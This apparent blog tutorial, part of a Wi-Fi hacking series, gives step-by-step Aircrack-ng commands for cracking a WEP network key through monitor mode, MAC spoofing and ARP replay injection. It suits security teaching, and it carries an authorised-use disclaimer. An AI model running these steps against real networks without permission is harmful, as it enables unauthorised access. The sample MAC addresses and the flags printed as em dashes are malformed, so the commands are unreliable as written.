Wi-Fi Hacking Series- Exploring WEP Attacks (Part-2)

Vengeance
3 min readJun 30, 2023

This is part 2 of the Wi-Fi Hacking series. In this article, we will be going through the demonstration of attacking WEP-secured wifi. For this demonstration, we will be using Aircrack-ng suite tools.

Disclaimer: This article is intended for educational and ethical purposes only. It should only be used on your own personal Wi-Fi network or on a network where you have obtained explicit permission from the owner to perform security testing. Unauthorized hacking of someone else’s Wi-Fi network is illegal and unethical.

Aircrack-ng logo

WEP Attack (Cracking WEP password)

  1. Use airmon-ng to put the wireless adapter into monitor mode.

Command: airmon-ng start wlan0

wlan0 is a wireless network interface. Run ifconfig command to view the wireless network interface.

Running airmon-ng command to put wireless adapter into monitor mode

2. Use airodump-ng to capture available wifi networks.

Command: airodump-ng wlan0mon

wlan0mon is the name of the wireless network interface on monitor mode.

3. From the above list of access points, we will select the one with WEP encryption using airodump-ng.

Command: airodump-ng — bssid 12:78:A5:5B:7N:33 -c 6 — write WEPWifiCrack wlan0mon

— bssid is MAC address of the router or the access point

-c is the channel/frequencies used by the access point

— write is used to save the dump file using the specific file name

wlan0mon is the wireless network interface on monitor mode

We need to wait for someone to connect to the specific access point to get their MAC address so that we can spoof their MAC address and inject the packet.

4. Use aireplay-ng to inject ARP packet.

Command: aireplay-ng -3 -b 12:78:A5:5B:7N:33 -h 35:29:2J:A8:78:09 wlan0mon

-3 refers to the “ARP request replay” attack mode

-b is the MAC address of the access point or router

-h is the source MAC address

wlan0mon is the name of the wireless network interface on monitor mode

5. Finally crack the password using aircrack-ng.

Command: aircrack-ng WEPWifiCrack-01.cap

WEPWifiCrack-01.cap is the name of the capture file that contains the captured packets from a wireless network.

Finally, Use airmon-ng to stop the monitor mode on the wireless adapter.

Command: airmon-ng stop wlan0mon

Now you can use the key to connect to the wireless network.

Thank you for reading and hope you find this article informative. In the upcoming Part 3 of this series, we will present a demonstration of a brute-force attack on WPA-secured Wi-Fi networks to obtain passwords.

Twitter: Vengenace0x0

--

--

Vengeance

Penetration Tester | Trader/ Investor | Cyber Security Enthusiast | Bibliophile